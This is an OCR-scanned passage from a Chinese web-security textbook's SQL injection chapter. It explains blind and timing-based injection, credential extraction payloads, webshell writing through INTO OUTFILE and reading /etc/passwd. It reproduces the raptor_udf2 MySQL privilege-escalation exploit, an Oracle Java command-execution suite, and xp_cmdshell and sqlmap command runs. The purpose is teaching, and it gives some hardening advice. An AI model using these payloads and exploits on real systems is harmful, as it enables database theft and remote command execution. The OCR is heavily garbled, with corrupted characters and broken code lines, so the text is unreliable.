eijing';drop tal ble OrdersTable 


RIEZ. 原本 正常 执行 的 查询 语句 ， 现在 变 成 了 查询 完 后 由 执行 
一 个 drop 表 的 操作 ， 而 这 个 操作 ， 是 用 户 构造 了 恶意 数据 的 结 

回 过 头 来 看 看 注入 攻击 的 两 个 条 件 : 

(1) 用 户 能 够 控制 数据 的 输入 一 一 在 这 里 ， 用 户 能 够 控制 变量 


ShipCity ° 
(2) 原本 要 执 和 了 的 代码 ， DERE TE BLA, 


sql = "select * from Or de sTable whe 
chine sty = oy aN ipCi bv d cor 


这 个 < 拉 接 "的 过 程 很 重要 ， 正 是 这 个 拼接 的 过 程 导致 了 代码 的 注入 。 


在 SQL 注 入 的 过 程 中 ， 如 果 网 站 的 Web 服 务 器 开启 了 错误 回 显 ， 则 会 为 
a a et Nu 比如 攻击 者 在 参数 中 输入 一 个 单 引号 %”， 引 
起 执行 查询 语句 的 语法 错误 ， 服 务 絮 直接 返回 了 错误 信息 : 


Microso ft JET Database E e fü 5 '80040e14' 
字符 串 的 语法 错误 在 查询 表达 x Tine 49'' me 
/showdetail.asp, 行 8 


从 错误 信息 中 可 以 知道 ， 服 务 器 用 的 是 Access 作 为 数据 库 ， 查 询 语句 的 
伪 代 码 极 有 可 能 是 


select xxx from table X where id = $id 


错误 回 显 披露 了 敏感 信息 ， 对 于 攻击 者 来 说 ， 构 造 SQL 注入 的 语句 就 
可 以 更 加 得 心 应 手 了 。 

7.1.1 Hit (Blind Injection) 

但 很 多 时 候 ，Web 服 务 器 关闭 了 铺 误 回 显 ， 这 时 束 没 有 办 法 成 功 实施 
SQL 注入 攻击 了 吗 ? 攻击 者 为 了 应 对 这 种 情况 ， 便 究 出 了 “ 言 
注 ” (Blind In-jection) 的 技巧 。 

Arig“ BE”, Wie EARS aie APS RI I SEE A a o ARH as 
没有 错误 回 显 ， 对 于 攻击 者 来 说 缺少 了 非常 重要 的 “调试 信息 ”， 所 以 
攻击 者 必须 找到 一 个 方法 来 验证 注入 的 SQL 语句 是 否 得 到 执行 。 

最 常见 的 盲 注 验 证 方法 是 ， 构 造 简 单 的 条 件 语 句 ， 根 据 返 回 页 面 是 否 
发 生变 化 ， 来 判断 SQL 语句 是 否 得 到 执行 。 

比如 ， 一 个 应 用 的 URL 如 下 : 


http://newspaper.com/items.php?id-2 


执行 的 SQL 语句 为 : 


SELECT title, description, body FROM items 
WHERE ID 2 


如 琳 攻 击 者 构造 如 下 的 条 件 语 句 ]: 


http://newspaper .com/items.php?id=2 and 1=2 


实际 执行 的 SQL 语句 就 会 变 成 : 


SELECT title, description, body FROM items 
ID - 2 and 1-2 


因为 “and 1=2? 永 远征 一 个 假 命 题 ， 所 以 这 条 SQL 语句 的 "and" 条 件 永远 
无 法 成 立 。 对 于 Web 应 用 来 说 ， 也 不 会 将 结果 返回 给 用 户 ， 攻 击 者 看 到 
的 页 面 结 果 将 为 空 或 者 是 一 个 出 错 页 面 。 

为 了 进一步 确认 注入 是 否 存 在 ， 攻 击 痢 还 必须 再 次 验证 这 个 过 程 。 因 
为 一 些 处 理 逻 辑 或 安全 功能 ， 在 攻击 者 构造 异常 请 求 时 ， 也 可 能 会 导 
致 页 面 返回 不 正常 。 攻 击 者 继续 构造 如 下 请 求 : 

当 攻 击 阁 构造 条 件 “and 1=1 时 ， 如 条 页 面 正 冲 返回 了 ， 则 说 明 SQL 语 
句 的 “and” 成 功 执 行 ， 那 么 束 可 以 判断 “id” 参 数 存 在 SQL 注 入 漏洞 了 。 
在 这 个 攻击 过 程 中 ， 服 务 絮 虽然 关闭 了 错误 回 显 ,但 是 攻击 者 通过 人 简 
单 的 条 件 判断 ， 再 对 比 页 面 返 回 结果 的 差异 ， 就 可 以 判断 出 SQL 注 入 
漏洞 是 否 存在 。 这 了 束 是 让 注 的 工作 原理 。 如 下 例 : 
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当 广 入 语句 的 条 件 为 真 时 返回 正音 页 面 


再 输入 条 件 “and 1=2”，SQL 语 名 执行 后 ， 因 为 1=2 永 远 不 可 能 为 真 ， 
此 SQL 语句 无 法 返回 查询 到 的 数据 。 
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gH 
当 注入 语句 的 条 件 为 假 时 没有 查询 到 具体 内 容 
由 此 可 立即 判断 漏洞 存在 。 


7.1.2 Timing Attack 

2011 年 3 月 27 日 ， 一 个 名 叫 TinKode 的 黑客 在 著名 的 安全 邮件 列表 Full 
Disclosure 上 公布 了 一 些 他 入 侵 mysqlcom 所 获得 的 细节 。 这 次 入 侵 事 
件 ， 就 是 由 一 个 SQL 注入 漏洞 引起 的 。 MySQL 是 当今 世界 上 最 流行 的 
数据 库 软 件 之 一 。 

据 墨 客 描述 ， 这 个 漏洞 出 在 下 面 这 个 页 面 : 

€ > Œ fF © mysal.com/customers/view/index.html?id=1170 
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mysql.com 存 在 漏洞 的 页 面 
通过 改变 参数 id 的 值 ， 服 务 器 将 返回 不 同 的 客户 信息 。 这 个 参数 存在 一 
个 非常 隐蔽 的 < 言 注 :漏洞 通过 简单 的 条 件 语 名 比如 cd 1- 2” 是 无 法 


看 出 异常 的 。 在 这 里 黑客 用 了 “ 盲 注 ” 的 一 个 技巧 : Timing Attack, XF] 
Br ds AA FETE © 
MySQL, @—“SBENCHMARKO MA, "E Æ Fi T it Acre Be 
的 。 它 有 两 个 参数 : 

BENCHMARK ( count , expr) 
函数 执行 的 结果 ， 是 将 表达 式 expr 执 行 count 次 。 比 如 : 


mysql> SELECT 
BENCHMARK ( 1000000, ENCODE ( ' hello', 'goodbye' 
i 
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ppt in set (4.74 sec) 
就 将 ENCODE('hello','goodbye') 执 行 了 1000000 次 ， 共 用 时 4.74 秒 。 
因此 ， 利 用 BENCHMARKO 函 数 ， 可 以 让 同一 个 函数 执行 在于 次 ,使 
得 结果 返回 的 时 间 比 平时 要 长 ， 通 过 时 间 长 短 的 变化 ， 可 以 判断 出 注 
入 语句 是 否 执 行 成 功 。 这 是 一 种 边 信道 攻击 ， 这 个 技巧 在 盲 注 中 被 称 
为 Tim-ing Attack ° 
攻击 者 接 下 来 要 实施 的 就 是 利用 Timing At-tack 完 成 这 次 攻击 ， 这 是 一 
个 需要 等 待 的 过 程 。 比 如 构造 的 攻击 参数 id 值 为 : 

1170 UNION SELECT IF(SUBSTRING(current,1,1) = 

CHAR(119), BENCHMARK ( 5900000, ENCODE( ' MSG' , ' by 


5 seconds')),null) FROM (Select Database() 
as current) as tbl; 


这 段 Payload 判 断 库 名 的 第 一 个 字母 是 否 为 CHAR(119)， 即 小 写 的 w。 如 
果 判 断 结果 为 真 ， 则 会 通过 BENCHMARKO 画 数 造成 较 长 延 时 ， 如 果 
不 为 真 ， 则 该 语句 将 很 快 执行 完 。 攻 击 者 遍历 所 有 字母 ， 直 到 将 整个 
数据 库 名 全 部 验证 完成 为 止 。 

与 此 类 似 ， 还 可 通过 以 下 函数 获取 到 许多 有 用 信息 : 


database() - the name of the database 
currently connected to. 

system user() - the system user for the 
database. 

current user() - the current user who is 
logged in to the database. 

last insert id() - the transaction ID of the 
last insert operation on the database. 


如 果 当 前 数据 库 用 户 (curent user) 具有 写 权 限 ， 那 么 攻击 者 还 可 以 
ee 。 比 如 写 入 Web 目 录 中 ， 攻 击 者 就 有 可 能 下 载 这 


1170 Union All SELECT table name, 

table type, engine FROM 

information schema.tables WHERE 

table schema - 'mysql' ORDER BY table name 
DESC INTO OUTFILE 

' /path/location/on/server/www/schema.txt ' 


此 外 ， 通 过 Dump 文 件 的 方法 ， 还 可 以 写 入 一 个 webshell: 


1170 UNION SELECT "<? 

Mt. REQUEST['cmd']); ?>",2,3,4 INTO 
oUm 

re php" -- 


Timing Attack 是 盲 注 的 一 种 高 级 技巧 。 在 不 同 的 数据 库 中 ， 都 有 着 类 似 
TBENCHMARKORJERZX, PJ] A% Timing Attack 所 利用 。 
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更 多 类 似 的 画 WHL 可 可 以 查阅 每 个 数据 库 软 件 的 手册 。 


7.2 ”数据 库 攻击 技巧 

找到 SQL 注入 漏洞 ， 仅 仅 是 一 个 开始 。 要 实施 一 次 完整 的 攻击 ， 还 有 
许多 事情 需要 做 。 在 本 下 中 ， 将 介绍 一 些 具 有 代表 性 的 SQL 注入 技 
巧 。 了 解 这 些 技巧 ， 有 助 于 更 深入 地 理解 SQL 注 入 的 攻击 原理 。 

SQL 注 入 是 基于 数据 库 的 一 种 攻击 。 不 同 的 数据 库 有 着 不 同 的 功能 
| 
7.2.1 和 常见 的 攻击 技巧 

SQL 注 入 可 以 猜 解 出 数据 库 的 对 应 版 本 ， 比 如 下 面 这 段 Payload， 如 果 
MySQL 的 版 本 是 4， 则 会 返回 TRUE: 


http://www.site.com/news. ee 5 and 
substring(@@version,1,1)=4 


下 面 这 段 Payload， 则 是 利用 union select 来 分 别人 确认 表 名 admin 是 否 存 
在 ， 列 名 passwd 是 否 存 在 : 


id=5 union all select 1,2,3 from admin 
id-5 union all select 1,2,passwd from admin 


进一步 ， 想 要 猜 解 出 username 和 password 有 具体 的 值 ， 可 以 通过 判断 字符 
的 范围 ， 一 步 步 读 出 来 : 


id=5 and ascii(substring((select 

concat (username, 0x3a, passwd) from users limit 
0,1),1,1))>64 /*ret true)*/ 
id=5 and ascii(substring((s 


elect 
concat (username, 0x3a, passwd) from users limit 
0,1),1,1))>96 /*ret true*/ 
id=5 and ascii(substring((select 
concat(username, 0x3a, passwd) from users limit 
0,1),1,1))>100 /*ret false*/ 

id=5 and ascii(substring((se 

concat (username, 0x3a, passwd) 

0,1),1,1))>97 /*ret false*/ 


ect 
from users limit 


id=5 and ascii(substring((select 
concat (username, 0x3a, passwd) from users limit 
0, nd 2,1))>64 /*ret true*/ 


这 个 过 程 非常 的 烦琐 ， 所 以 非常 有 必要 使 用 一 个 自动 化 工具 来 帮助 完 
成 整个 过 程 。sglmap.py 就 是 一 个 非常 好 的 上 自动 化 注入 工具 。 


$ python sqlmap. py -u “http://192. 168. 136. 131/sqlmap/firebird/get int.php?id-1" --dump -T users 
[sve] 


Database: Firebird masterdb 
Table: USERS 
[4 entries] 


和 ——— 4 
| ID | NAME | SURNAME | 
+H- fn nn + 
| 1 | luther | blisset | 
| 2 | fluffy | bunny | 
| 3 | wu | ming | 
| 4 | NULL | nameisnull | 
一 一 一 一 一 一 ——— ae 4 


sqlmap.py 的 攻击 过 程 

在 注入 攻击 的 过 程 中 ， 稼 常会 用 到 一 些 读 写 文件 的 技巧 。 比 如 在 
MySQL 中 ， 就 可 以 通过 LOAD_FILEO 读 取 系 统 文件 ， 并 通过 
INTODUMPFILE 写 入 本 地 文件 。 当 然 这 有 要求 当前 数据 库 用 户 有 读 写 系 
统 相应 文件 或 目录 的 权限 。 


.. union select 1,1, LOAD FILE('/etc/ 
passwd'),1,1; 


E Fea 2a DG ee, WURIDDABER Tak PSK 
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CREATE TABLE potatoes(line BLOB); 

UNION SELECT 1,1, HEX(LOAD FILE('/etc/ 

passwd')),1,1 INTO DUMPFILE '/tmp/potatoes'; 
/potatoes' INTO TABLE 


这 需要 当前 数据 库 用 户 有 创建 表 的 权限 。 首 先 通过 LOAD_FILE() 将 系 
统 文 件 读 出 ， 再 通过 INTODUMPFILE 将 该 文件 写 入 系统 中 ， 然 后 通过 
LOAD DATA INFILE 将 文件 导入 创建 的 表 中 ， 最 后 就 可 以 通过 一 般 的 
注入 技巧 直接 操作 表 数 据 了 。 

除了 可 以 使 用 INTO DUMPFILE 外 ， 还 可 以 使 用 INTO OUTFILE, WE 
的 区 别 是 DUMPFILE 适 用 于 二 进 制 文件 ， 它 会 将 目标 文件 写 入 同一 行 
A; 而 OUTEFILE 则 更 适用 于 文本 文件 。 

写 入 文件 的 技巧 ， 经 常 被 用 于 导出 一 个 Web-shell， 为 攻击 者 的 进一步 
攻击 做 铺垫 。 因 此 在 设计 数据 库 安全 方案 时 ， 可 以 禁止 普通 数据 库 用 
户 具备 操作 文件 的 权限 。 

7.2.2 ”命令 执行 

在 MySQL 中 ， 除 了 可 以 通过 导出 webshell 间 接地 执行 命令 外 ， 还 可 以 利 
用 用 户 自 定义 函数 ”的 技巧 ， 即 UDF (User-Defined Functions) 来 执行 
命令 。 

在 流行 的 数据 库 中 ， 一 般 都 支持 从 本 地 文件 系统 中 导入 一 个 共享 库 文 
件 作为 自 定义 函数 。 使 用 如 下 语法 可 以 创建 UDF: 


在 MySQL 4 的 服务 嚣 上，Marco Ivaldi 公 布 了 如 下 的 代码 ， 可 以 通过 
UDF 执 行 系统 命令 。 尤 其 是 当 运 行 mysql 进 程 的 用 户 为 root 时 ， 将 直接 
获得 root 权 限 。 


* $Id: raptor udf2.c,v 1.1 2006/01/18 
17:58:54 raptor Exp $ 
* 


* raptor udf2.c - dynamic library for 
do system() MySQL UDF 

* Copyright (c) 2006 Marco Ivaldi 
«raptorQOxdeadbeef . info» 

* 


* This is an helper dynamic library for 
local privilege escalation through 


i 


d 


* MySQL run with root privileges (very bad 
dea!), slightly modified to work 

* with newer versions of the open-source 
atabase. Tested on MySQL 4.1.14. 


* 


* See also: http://www.Oxdeadbeef .info/ 


exploits/raptor udf.c 
* 
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* Starting from MySQL 4.1.10a and MySQL 
0.24, newer releases include fixes 

* for the security vulnerabilities in the 
andling of User Defined Functions 

* (UDFs) reported by Stefano Di Paola 
stefano.dipaolaQwisec.it». For further 

* details, please refer to: 

* 

* http://dev.mysql.com/doc/refman/5.0/en/ 
df-security.html 
http://www.wisec.it/vulns.php?page-4 
http://www.wisec.it/vulns.php?page-5 
http://www.wisec.it/vulns.php?page-6 


+ ee OF 


* "UDFs should have at least one symbol 
efined in addition to the xxx symbol 

* that corresponds to the main xxx() 
unction. These auxiliary symbols 

* correspond to the xxx_init(), 
xx_deinit(), xxx_reset(), xxx_clear(), and 
* xxx_add() functions". -- User Defined 
unctions Security Precautions 


* uid=500(raptor) gid=500(raptor) 
roups=500( raptor) 

* $ gcc -g -c raptor udf2.c 

* $ gcc -g -shared -W1, - 

oname,raptor udf2.so -o raptor udf2.so 
aptor udf2.0 -lc 

$ mysql -u root -p 

Enter password: 

[...] 

mysql» use mysql; 

mysql» create table foo(line blob); 
mysql» insert into foo values(load file('/ 
ome/raptor/raptor udf2.so')); 

* mysql» select * from foo into dumpfile '/ 
sr/lib/raptor udf2.so'; 

* mysql» create function do system returns 
nteger soname 'raptor udf2.so'; 

* mysql» select * from mysql.func; 


+o 0e OE bae 


* 十 ----------- *----- +---------------- 
---------- 十 
| name | ret | dl | type | 
+----------- +----- +---------------- 
---------- 十 
* | do system | 2 | raptor udf2.so 
unction | 
* 十 ----------- +----- +---------------- 
T 十 


* mysql» select do system('id > /tmp/out; 
hown raptor.raptor /tmp/out'); 
* mysql> \! sh 
* sh-2.05b$ cat /tmp/out 
* uid=0(root) gid=0(root) 
roups=0(root),1(bin),2(daemon),3(sys),4(adm) 
* 

e] 


#/ 

include «stdio.h» 

include «stdlib.h» 

num Item result (STRING RESULT, 

EAL RESULT, INT RESULT, ROW RESULT); 
ypedef struct st udf args { 

unsigned int arg count; // number of 
rguments 

enum Item result  *arg type; // pointer 
o item result 

char **args; // pointer to arguments 
unsigned long ^*lengths; // length of 
tring args 

char *maybe null; // 1 for maybe null 


rgs 
UDF_ARGS; 

ypedef struct st_udf_init { 

char maybe_null; // 1 if func can 
eturn NULL 


unsigned int decimals; // for real 
unctions 

unsigned long max length; // for string 
unctions 

char *ptr; // free ptr for func data 
char const item; // 0 if result is 
onstant 

UDF INIT; 

nt do system(UDF INIT *initid, UDF ARGS 
args, char *is null, char *error) 


if (args-»arg count !- 1) 
return(0); 
system(args-»args[0]); 
return(0); 


char do_system_init(UDF_INIT *initid, 
UDF_ARGS *args, char *message) 


return(0); 


但 是 这 段 代 码 在 MySQL 5 及 之 后 的 版 本 中 将 受到 限制 ， 因 为 其 创建 自 
定义 函数 的 过 程 并 不 符合 新 的 版 本 规范 ， 且 返回 值 永 远 是 0。 

后 来 安全 人 研究 者 们 找到 了 另外 的 方法 一 一 通过 lib_mysqludf_sys 提 供 的 
几 个 函数 执行 系统 命令 ， 其 中 最 主要 的 函数 是 sys_eval0 和 sys_exec()。 
在 攻击 过 程 中 ， 将 lib_mysqludf _sys.so 上 传 到 数据 库 能 访问 到 的 路 径 
下 。 在 创建 UDF 之 后 ， 就 可 以 使 用 sys_eval0 等 画 数 执行 系统 命令 了 。 ? 
sys_eval， 执 行 任 意 命令 ， 并 将 输出 返回 。 


* Sys exec, 执行 任意 命令 ， 并 将 退出 码 返 回 。 ?sys_get， 获 取 一 个 
环境 变量 o 
。 sys_set， 创 建 或 修改 一 个 环境 变量 。 


lib_mysqludf_sys 的 相关 信息 可 以 在 官方 网 站 获得 ， 使 用 方法 如 下 : 


$ wget --no-check-certificate https://svn.sqlmap.org/sqlmap/trunk/sqlmap/ 
extra/mysqludfsys/lib mysqludf sys 0.0.3.tar.gz 
$ tar xfz lib mysqludf sys 0.0.3.tar.gz 

$ cd lib mysqludf sys 0.0.3 

$ sudo ./install.sh 

Compiling the MySQL UDF 

gcc -Wall -I/usr/include/mysql -I. -shared 

lib mysqludf sys.c -o 

/usr/lib/lib mysqludf sys.so 

MySQL UDF compiled successfully 

Please provide your MySQL root password 

Enter password: 

MySQL UDF installed successfully 

$ mysql -u root -p mysql 

Enter password: 


1 row in set (0.02 sec) 
mysql» SELECT sys exec('touch /tmp/ 


| 

+----------------------------------- 十 
1 row in set (0.02 sec) 

mysql> exit 

Bye 

$ ls -1 /tmp/test mysql 


-rw-rw---- 1 mysql mysql 0 2009-01-16 
23:18 /tmp/test mysql 


自动 化 注入 工具 sqlmap 已 经 集成 了 此 功能 。 


$ python sqlmap.py -u 
"http://192.168.136.131/sqlmap/pgsql/ 


get int.php?id-1" --os-cmd id 
-v 1 


web application technology: PHP 5.2.6, 
Apache 2.2.9 
back-end DBMS: PostgresQL 

hh:mm:12 INFO] fingerprinting the back- 
end DBMS operating system 

hh:mm:12 INFO] the back-end DBMS 
operating system is Linux 

hh:mm:12 INFO] testing if current user is 
DBA 
hh:mm:12 INFO] detecting back-end DBMS 
version from its banner 

hh:mm:12 INFO] checking if UDF 'sys eval' 
already exist 
hh:mm:12 INFO] checking if UDF 'sys exec' 
already exist 
hh:mm:12 INFO] creating UDF 'sys eval' 
from the binary UDF file 

hh:mm:12 INFO] creating UDF 'sys exec' 
from the binary UDF file 

do you want to retrieve the command standard 
output? [Y/n/a] y 

command standard output: 

'uid-104(postgres) gid=106(postgres) 
groups-106(postgres) 

[hh:mm:19] [INFO] cleaning up the database 
management system 

do you want to remove UDF 'sys eval'? [Y/n] y 
do you want to remove UDF 'sys exec'? [Y/n] y 
[hh:mm:23] [INFO] database management system 
cleanup finished 

[hh:mm:23] [WARNING] remember that UDF 

shared object files saved on the file system 
-- $Id: raptor oraexec.sql,v 1.2 2006/11/23 
23:40:16 raptor Exp $ 

-- raptor oraexec.sql - java exploitation 
suite for oracle 

-- Copyright (c) 2006 Marco Ivaldi 
«raptorQOxdeadbeef . info» 

-- This is an exploitation suite for Oracle 
written in Java. Use it to 

-- read/write files and execute OS commands 
with the privileges of the 

-- RDBMS, if you have the required 
permissions (DBA role and SYS:java). 

-- "The Oracle RDBMS could almost be 
considered as a shell like bash or the 
-- Windows Command Prompt; it's not only 
capable of storing data but can also 

-- be used to completely access the file 
system and run operating system 

-- commands" -- David Litchfield 
(http://www.databasesecurity.com/) 

-- Usage example: 

-- $ sqlplus "/ as sysdba" 


-- [...] 
-- SQL» Qraptor oraexec.sql 
LO[Deed 


-- SQL» exec javawritefile('/tmp/mytest', '/ 
bin/ls -1 > /tmp/aaa'); 

-- SQL» exec javawritefile('/tmp/mytest', '/ 
bin/ls -1 / > /tmp/bbb'); 

-- SQL» exec dbms_java.set_output(2000) ; 

-- SQL> set serveroutput on; 

-- SQL> exec javareadfile('/tmp/mytest'); 

-- /bin/ls -1 > /tmp/aaa 

-- /bin/ls -1 / >/tmp/bbb 

-- SQL» exec javacmd('/bin/sh /tmp/mytest'); 


-- SQL» !sh 

-- $ ls -rtl /tmp/ 

em EE 

-- -rw-r--r-- 1 oracle system 45 
Nov 22 12:20 mytest 

-- -rw-r--r-- 1 oracle system 1645 
Nov 22 12:20 aaa 

-- -rw-r--r-- 1 oracle system 8267 
Nov 22 12:20 bbb 

OD] 


create or replace and resolve java source 
named "oraexec" as 
import java.lang.*; 
import java.io.*; 
public class oraexec 
{ 
/* 
* Command execution module 
* 
public static void execCommand(String 
command) throws IOException 


Runtime.getRuntime().exec(command); 


* 
* File reading module 
*/ 


public static void readFile(String 
filename) throws IOException 
{ 


FileReader f = new FileReader(filename) ; 
BufferedReader fr = new BufferedReader (f); 
String text = fr.readLine(); 
while (text != null) 
System.out.println(text); 
text - fr.readLine(); 


} 
fr.close(); 
} 


* 
* File writing module 
/ 


public static void writeFile(String 
filename, String line) throws IOException 


Filewriter f = new FileWriter(filename, 
true); /* append */ 

Bufferedwriter fw = new Bufferedwriter(f); 

fw.write(line); 

fw.write("\n"); 

fw.close(); 


} 
/ 
-- usage: exec javacmd('command'); 
create or replace procedure 
javacmd(p command varchar2) as 
language java 
name 'oraexec.execCommand(java.lang.String)'; 
/ 
-- usage: exec dbms java.set output(2000); 
- et serveroutput on; 
exec javareadfile(' /path/to/file' Ju 
create or replace procedure 
javareadfile(p filename in varchar2) as 
language java 
name 'oraexec.readFile(java.lang.String)' 
/ 
-- usage: exec javawritefile('/path/to/ 
file', 'line to append'); 
create or replace procedur 
javawritefile(p_filename in — p line 
in varchar2) as 
language java 
name 'oraexec. writeFile(java. lang.String, 
java.lang.String)'; 
/ 


一 般 来 说 ， 在 数据 库 中 执行 系统 命令 ， 要 求 具 有 较 高 的 权限 。 在 数据 
库 加 固 时 ， 可 以 参阅 官方 文档 给 出 的 安全 指导 文档 。 

在 建立 数据 库 账 户 时 应 该 遵循 “最 小 权限 原则 ”， 尽 量 避 免 给 Web 应 用 使 
用 数据 库 的 管理 员 权限 。 

7.2.3 ”攻击 存储 过 程 

存储 过 程 为 数据 库 提 供 了 强大 的 功能 ， 它 与 UDF 很 像 ， 但 存储 过 程 必 
须 使 用 CALL 或 者 EXE-CUTE 来 执行 。 在 MS SQL Server 和 和 Oracle 数据库 
中 ， 都 有 大 量 内 置 的 存储 过 程 。 在 注入 攻击 的 过 程 中 ， 存 储 过 程 将 为 
攻击 者 提供 很 大 的 便利 。 

在 MS SQL Server 中 ， 存 储 过 程 “xp_cmd-shell” 可 谓 是 具名 
的 墨客 教程 在 讲 到 注入 SQL Server rie BEA 2 75 


EXEC master.dbo.xp cmdshell 'cmd. exe dir c: 
EXEC master.dbo.xp cmdshell 'ping 


xp cmdshellZE SQL Server 2000 中 默认 是 开局 的 ， 但 在 SQL Server 2005 
及 以 后 版 本 中 则 默认 被 禁止 了 。 但 是 如 果 当 前 数据 库 用 户 拥 有 sysad- 


* I, 
Ps 


Ha 
HB 


min 权 限 ， 则 可 以 使 用 sp_configure (SQL Server2005 与 SQL Server 
2008) 重新 开启 它 ， 如 果 在 SQLServer 2000 中 禁用 了 xp_cmdshell， 则 可 
以 使 用 sp_addextendedproc 开 局 它 。 


EXEC sp configure 'show advanced options',1 
RECONFIGURE 

EXEC sp configure 'xp cmdshell',1 
RECONFIGURE 


除了 xp_cmdshell 外 ， 还 有 一 些 其 他 的 存储 过 程 对 攻击 过 程 也 是 有 帮助 
的 。 比 如 xp_regread 可 以 操作 注册 表 :; 


exec xp regread HKEY LOCAL MACHINE 
'SYSTEMNCurrentControlSetNServices 
\lanmanserver\parameters', 
'nullsessionshares' 

exec xp regenumvalues HKEY LOCAL MACHINE 
'SYSTEMNCurrentControlSetNServicesNsnmp 
NparametersNvalidcommunities' 


可 以 操作 注册 表 的 存储 过 程 还 有 : 


xp regaddmultistring 

xp regdeletekey 

xp regdeletevalue 

xp regenumkeys 

xp regenumvalues 

xp regread 

xp regremovemultistring 
e xp regwrite 


此 外 ， 以 下 存储 过 程 对 攻击 者 也 非常 有 用 。 


e xp_servicecontrol， 人 允许 用 户 启动 、 停 止 服务 。 如 : 


(exec master..xp servicecontrol 
'start', 'schedule' 
exec master..xp servicecontrol 
'start','server') 


e xp_availablemedia， 显 示 机 右上 有 用 的 驱动 器 。 
e xp_dirtree， 人 允许 获得 一 个 目录 树 。 

e xp_enumdsn， 列 举 服务 右上 的 ODBC 数 据 产 。 
e xp_loginconfig， 获 取 服 务 器 安全 信息 。 


e Xp_makecab， 人 允许 用 户 在 服务 器 上 创建 一 个 压缩 文件 。 
e Xp_ntsec_enumdomains， 列 举 服务 如 可 以 进入 的 域 。 
e xp_terminate_process， 提 供 进 程 的 进程 ID， 终 止 此 进程 。 


除了 利用 存储 过 程 直 接 攻 击 外 ， 和 存储 过 程 本 身 也 可 能 会 存在 注入 沁 
洞 。 我 们 看 下 面 这 个 PL/SQL 的 例子 。 


get 


procedu et item ( 
OUT ItmCurTyp, 
har2 


re 
itm cv IN 
usr i z 
itm in varchar2) 


is 
open itm_cv for ' SELECT * FROM items WHERE 
1 


在 这 个 存储 过 程 中 ， 变 量 usr 和 itemname 都 是 由 外 部 传 入 的 ， 且 未 经 过 

任何 处 理 ， 将 直接 造成 SQL 注入 问题 。 在 Oracle 数 据 库 中 ， 由 于 内 置 的 

po rues 很 多 存储 过 程 都 可 能 存在 SQL 注入 问题 ， 需 要 特别 
EE 注意。 

7.2.4 ”编码 问题 

在 有 些 时 候 ， 不 同 的 字符 编码 也 可 能 会 导致 一 些 安 全 问题 。 在 注入 的 

历史 上 ， 和 曾经 出 现 过 “基于 字符 集 * 的 注入 攻击 技巧 。 

注入 攻击 中 常常 会 用 到 单 引 号 “”、 双 3 引号“*” 等 特殊 字符 。 在 应 用 中 ， 

开发 者 为 了 安全 ， 经 常会 使 用 转 义 字符 “来 转 义 这 些 特殊 字符 。 但 当 

数据 库 使 用 了 “ 宽 字 符 集 * 时 ， 可 能 会 产生 一 些 意 想 不 到 的 漏洞。 比 

如 ， 当 MySQL 使 用 了 GBK 编 码 时 ，0xbf27 和 0xbf5c 都 会 被 认为 是 一 个 

字符 OF TET) ° 


Dx Sp 
0x27 = 
Ox bf 27 = QUU 


Ox bf 5c = f ———9 db interprets as a Single chinese char 


db interprets as 2 chars 


宽 字 符 问 题 

而 在 进入 数据 库 之 前 ， 在 Web 语 言 中 则 没有 考虑 到 双 字 让 字符 的 问题 ， 
XCE P TEASE ABOAZI EMT EP ° 比如 PHP 中 的 addslashesO) 函 数 ， 或 者 
当 magic_gquotes_gpc 开 局 时 ， 会 在 特殊 字符 前 增加 一 个 转 义 字符 “> o 
addslashes() 范 数 会 转 义 4 个 字符 : 


Returns a string with backslashes before 
characters that need to be quoted in database 
queries etc. haracters are single 
quote ('), double quote ("), backslash (*) 


NUL (the NULL byte). 


因此 ， 假 如 攻击 者 输入 : 


Oxbf27 or 1-1 


BI: 

¿ or 1=1 

经 过 转 义 后 ， 会 变 成 0xbf5c27 (“的 ASCII 码 为 0x5c) ， 但 0xbf5c 又 是 

Ox bf 5c = & 

因此 原本 会 存在 的 转 义 符号 ^»*， 在 数据 库 中 就 被 “ 吃 掉 “* 了 ， 变 成 : 

f OR 1=1 

要 解决 这 种 问题 ， 需 要 统一 数据 库 、 操 作 系 统 、Web 应 用 所 使 用 的 字符 
。 统一 设置 为 UTF-8 是 一 个 很 好 
A 法 o 

基于 字符 集 的 攻击 并 不 局 限于 SQL 注入 ， 凡 是 会 解析 数据 的 地 方 都 可 
能 存在 此 问题 。 比 如 在 XSS 攻 击 时 ， 由 于 浏览 器 与 服务 器 返回 的 字符 编 

码 不 同 ， 也 可 能 会 存在 字符 集 攻 击 。 解 决 方法 就 是 在 HIML 页面 的 
<meta> 标 和 俭 中 指定 当前 页 面 的 charset ° 

如 果 因 为 种 种 原因 无 法 统一 字符 编码 ， 则 需要 单独 实现 一 个 用 于 过 滤 
或 转 义 的 安全 函数 ， 在 其 中 需要 考虑 到 字符 的 可 能 范围 。 

比如 ，GBK 编 码 的 字符 范围 为 : 


GBK/1: GB2312 FXF — AI-A9 || AI-FE 


GBK2: GB2312 汉字 B0-F7 | AI-FE 
GBK/3: 扩充 汉字 81~A0 || 40-FE 
GBK/4: P RUE AA~FE || 40~A0 
GBK/5: 扩充 非 汉 字 A8~A9 || 40-A0 


根据 系统 所 使 用 的 不 同 字 符 集 来 限制 用 户 输入 数据 的 字符 允许 范围 ， 
ARMELE o 

7.2.5 SQL Column Truncation 

20084£8H, Stefan Esser 提 出 了 一 种 名 为 “SQL Column Truncation” HJI 
击 方式 ， 在 某 些 情况 下 ， 将 会 导致 发 生 一 些 安全 问题 。 

在 MySQL 的 配置 选项 中 ， 有 一 个 sql_mode 选 项 。 当 MySQL 的 sql-mode 
设置 为 default 时 ， 即 没有 开启 STRICT_ALL_TABLES 选 项 时 ，MYySQL 
对 于 用 户 插 入 的 超 长 值 只 会 提示 warn-ing， 而 不 是 error 《如 果 是 error 则 
插入 不 成 功 ) ， 这 可 能 会 导致 发 生 一 些 “ 和 截断 ”问题 。 

测试 过 程 如 下 (MySQL5) 。 

首先 开启 strict 模 式 。 


sql- 
mode-"STRICT TRANS TABLES, NO_AUTO_CREATE_USE 
R, NO ENGINE SUBSTITUTION" 


在 strict 模 式 下 ， 因 为 输入 的 字符 串 超 出 了 长 度 限 制 ， 因 此 数据 库 返 回 
一 个 error 信 息 ， 同 时 数据 插入 不 成 功 。 


mysql» create table 'truncated test' ( 
-> "id! int(11) NOT NULL auto increment, 
-> "username varchar(10) default NULL 
-> ‘password’ varchar(10) default NULL 
-> PRIMARY KEY ('id') 
-> )DEFAULT CHARSET=utf8; 

Query OK, © rows affected (0.08 sec) 

mysql> select * from truncated_test; 

Empty set (0.00 sec) 

mysql> show columns from truncated_test; 


+---------- +------------- +------ +----- 
+--------- +---------------- 十 

